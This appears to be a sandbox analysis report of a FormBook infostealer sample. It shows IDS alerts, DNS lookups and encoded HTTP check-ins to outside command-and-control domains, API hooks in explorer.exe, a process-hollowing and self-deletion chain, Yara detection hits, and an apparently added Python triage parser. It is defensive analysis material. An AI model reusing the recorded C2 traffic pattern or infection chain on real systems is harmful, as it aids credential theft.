                                                                                    01/13/21-21:49:23.525067TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.335.169.40.107
                                                                                    01/13/21-21:49:23.525067TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.335.169.40.107
                                                                                    01/13/21-21:49:44.263031TCP1201ATTACK-RESPONSES 403 Forbidden804975834.98.99.30192.168.2.3
                                                                                    01/13/21-21:50:25.240293TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.334.102.136.180
                                                                                    01/13/21-21:50:25.240293TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.334.102.136.180
                                                                                    01/13/21-21:50:25.240293TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.334.102.136.180
                                                                                    01/13/21-21:50:25.382643TCP1201ATTACK-RESPONSES 403 Forbidden804976034.102.136.180192.168.2.3

                                                                                    Network Port Distribution

                                                                                    TCP Packets


                                                                                    UDP Packets


                                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2021 21:49:23.327256918 CET | 192.168.2.3 | 8.8.8.8 | 0x7fa5 | Standard query (0) | www.the343radio.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:49:44.018774033 CET | 192.168.2.3 | 8.8.8.8 | 0xdfc0 | Standard query (0) | www.registeredagentfirm.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:50:04.467032909 CET | 192.168.2.3 | 8.8.8.8 | 0x718 | Standard query (0) | www.tiendazoom.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:50:25.127614975 CET | 192.168.2.3 | 8.8.8.8 | 0xad17 | Standard query (0) | www.eaglesnestpropheticministry.com | A (IP address) | IN (0x0001)

                                                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2021 21:49:23.387768984 CET | 8.8.8.8 | 192.168.2.3 | 0x7fa5 | No error (0) | www.the343radio.com | | 35.169.40.107 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:49:23.387768984 CET | 8.8.8.8 | 192.168.2.3 | 0x7fa5 | No error (0) | www.the343radio.com | | 34.225.31.148 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:49:44.081831932 CET | 8.8.8.8 | 192.168.2.3 | 0xdfc0 | No error (0) | www.registeredagentfirm.com | registeredagentfirm.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:49:44.081831932 CET | 8.8.8.8 | 192.168.2.3 | 0xdfc0 | No error (0) | registeredagentfirm.com | | 34.98.99.30 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:50:04.649347067 CET | 8.8.8.8 | 192.168.2.3 | 0x718 | No error (0) | www.tiendazoom.com | tiendazoom.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:50:04.649347067 CET | 8.8.8.8 | 192.168.2.3 | 0x718 | No error (0) | tiendazoom.com | | 174.136.37.109 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:50:25.198852062 CET | 8.8.8.8 | 192.168.2.3 | 0xad17 | No error (0) | www.eaglesnestpropheticministry.com | eaglesnestpropheticministry.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:50:25.198852062 CET | 8.8.8.8 | 192.168.2.3 | 0xad17 | No error (0) | eaglesnestpropheticministry.com | | 34.102.136.180 | A (IP address) | IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.the343radio.com
                                                                                    • www.registeredagentfirm.com
                                                                                    • www.tiendazoom.com

                                                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49756 | 35.169.40.107 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:49:23.525067091 CET | 7329 | OUT | GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1
Host: www.the343radio.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2021 21:49:23.657845974 CET | 7330 | IN | HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 13 Jan 2021 20:49:23 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.the343radio.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49758 | 34.98.99.30 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:49:44.124205112 CET | 7340 | OUT | GET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1
Host: www.registeredagentfirm.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2021 21:49:44.263031006 CET | 7340 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 13 Jan 2021 20:49:44 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5ffc8396-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49759 | 174.136.37.109 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:50:04.808011055 CET | 7341 | OUT | GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1
Host: www.tiendazoom.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2021 21:50:04.984437943 CET | 7342 | IN | HTTP/1.1 404 Not Found
Date: Wed, 13 Jan 2021 20:50:04 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Code Manipulations

                                                                                    User Modules

                                                                                    Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                                                                    Processes

                                                                                    Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE0
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE0
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE0
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE0

                                                                                    Statistics

                                                                                    Behavior


                                                                                    System Behavior

                                                                                    General

Start time: 21:47:39
Start date: 13/01/2021
Path: C:\Users\user\Desktop\HOPEFUL.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\HOPEFUL.exe'
Imagebase: 0xa40000
File size: 3437056 bytes
MD5 hash: 9C15AF175868121CC014666189D52DAE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                                    General

                                                                                    Start time:21:48:12
                                                                                    Start date:13/01/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                    Imagebase:0xde0000
                                                                                    File size:42080 bytes
                                                                                    MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, Metadefender
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:21:48:20
                                                                                    Start date:13/01/2021
                                                                                    Path:C:\Windows\explorer.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:
                                                                                    Imagebase:0x7ff714890000
                                                                                    File size:3933184 bytes
                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:21:48:37
                                                                                    Start date:13/01/2021
                                                                                    Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                                                    Imagebase:0x1040000
                                                                                    File size:36864 bytes
                                                                                    MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:21:48:42
                                                                                    Start date:13/01/2021
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                                    Imagebase:0xbc0000
                                                                                    File size:232960 bytes
                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:21:48:42
                                                                                    Start date:13/01/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
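
The process list above is the whole FormBook chain in miniature: a .NET dropper on the Desktop, a copy of AddInProcess32.exe written to %TEMP% and hollowed (Yara hits at its 0x400000 image base in a 0x40 region), a Windows binary from SysWOW64 (cmmon32.exe) carrying the same Yara hits in executable memory, and a cmd.exe that deletes the dropped file. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses plain-text "General" blocks like the ones above and turns the Yara "Source" names and command lines into triage notes. It assumes (the report does not say this) that the dump name is read as index.stage.uid.base.protection.type.sdmp with the protection field holding Windows PAGE_* constants, and the indicator rules are this script's own heuristics. The embedded excerpt is constructed from four of the blocks above with the Yara lines trimmed to one per process.

```python
"""Summarise a Joe Sandbox process list (plain-text export) into injection-chain indicators.

Added example, not part of the Joe Sandbox report. Assumption (not stated by the report):
the Yara "Source" dump name is <index>.<stage>.<uid>.<base>.<protection>.<type>.sdmp and
the protection field holds Windows PAGE_* constants. Indicator rules are heuristics.
"""
import re
from dataclasses import dataclass, field

PAGE_READWRITE = 0x04           # Windows memory protection constants
PAGE_EXECUTE_READWRITE = 0x40

# Constructed excerpt: four "General" blocks from the report, Yara lines trimmed to one each.
REPORT = """\
General
Path:C:\\Users\\user\\Desktop\\HOPEFUL.exe
Wow64 process (32bit):true
Commandline:'C:\\Users\\user\\Desktop\\HOPEFUL.exe'
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, Author: Joe Security
General
Path:C:\\Users\\user\\AppData\\Local\\Temp\\AddInProcess32.exe
Wow64 process (32bit):true
Commandline:C:\\Users\\user\\AppData\\Local\\Temp\\AddInProcess32.exe
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
General
Path:C:\\Windows\\SysWOW64\\cmmon32.exe
Wow64 process (32bit):true
Commandline:C:\\Windows\\SysWOW64\\cmmon32.exe
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Author: Joe Security
General
Path:C:\\Windows\\SysWOW64\\cmd.exe
Wow64 process (32bit):true
Commandline:/c del 'C:\\Users\\user\\AppData\\Local\\Temp\\AddInProcess32.exe'
"""

SOURCE_RE = re.compile(r"^(\w{8})\.(\w{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.(\w{8})\.sdmp$")
YARA_RE = re.compile(r"^• Rule: (?P<rule>[^,]+), Description: .*?, Source: (?P<src>[^,]+), Author:")
DEL_RE = re.compile(r"\bdel\b\s+'?([^']+?)'?\s*$", re.IGNORECASE)
WINDIR_RE = re.compile(r"\\windows\\(system32|syswow64)\\", re.IGNORECASE)


@dataclass
class MemDump:
    proc_index: str      # kept as the raw 8-char field; the report does not say how it maps to a PID
    base: int            # region base address
    protection: int      # assumed PAGE_* value


@dataclass
class Process:
    path: str = ""
    cmdline: str = ""
    wow64: bool = False
    yara: list = field(default_factory=list)   # (rule name, MemDump)


def parse_source(src: str) -> MemDump:
    """Split a dump file name into its assumed fields (see module docstring)."""
    m = SOURCE_RE.match(src)
    if not m:
        raise ValueError(f"unrecognised dump name: {src}")
    return MemDump(proc_index=m.group(1), base=int(m.group(4), 16), protection=int(m.group(5), 16))


def parse_processes(text: str) -> list:
    """Each 'General' line starts a block; Key:Value lines and '• Rule:' lines fill it."""
    procs = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "General":
            procs.append(Process())
            continue
        if not procs or not line:
            continue
        if line.startswith("• Rule:"):
            m = YARA_RE.match(line)
            if m:
                procs[-1].yara.append((m.group("rule"), parse_source(m.group("src"))))
            continue
        key, _, value = line.partition(":")
        if key == "Path":
            procs[-1].path = value
        elif key == "Commandline":
            procs[-1].cmdline = value
        elif key == "Wow64 process (32bit)":
            procs[-1].wow64 = value == "true"
    return procs


def triage(procs: list) -> dict:
    """Map each process path to a list of heuristic notes about its role in the chain."""
    dropped = {p.path.lower() for p in procs if "\\appdata\\local\\temp\\" in p.path.lower()}
    findings = {}
    for p in procs:
        notes = findings.setdefault(p.path, [])
        if p.path.lower() in dropped:
            notes.append("executable dropped to and run from %TEMP%")
        if p.yara and WINDIR_RE.search(p.path):
            notes.append("Yara hit inside a Windows binary: hollowed/injected host process")
        for rule, d in p.yara:
            if d.protection == PAGE_EXECUTE_READWRITE:
                notes.append(f"{rule} matched RWX region at {d.base:#x}: unpacked code, not a file-backed image")
        m = DEL_RE.search(p.cmdline)
        if m and m.group(1).lower() in dropped:
            notes.append("deletes the dropped payload: self-cleanup of the dropper stage")
    return findings


if __name__ == "__main__":
    for path, notes in triage(parse_processes(REPORT)).items():
        print(path)
        for n in notes:
            print("   -", n)
```

Run against the full page text instead of the embedded excerpt and the explorer.exe block shows up with no notes: it has no Yara hits listed here, so a triage based on this report alone should not claim it was injected, even though FormBook is known for doing so.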

                                                                                    Disassembly

                                                                                    Code Analysis
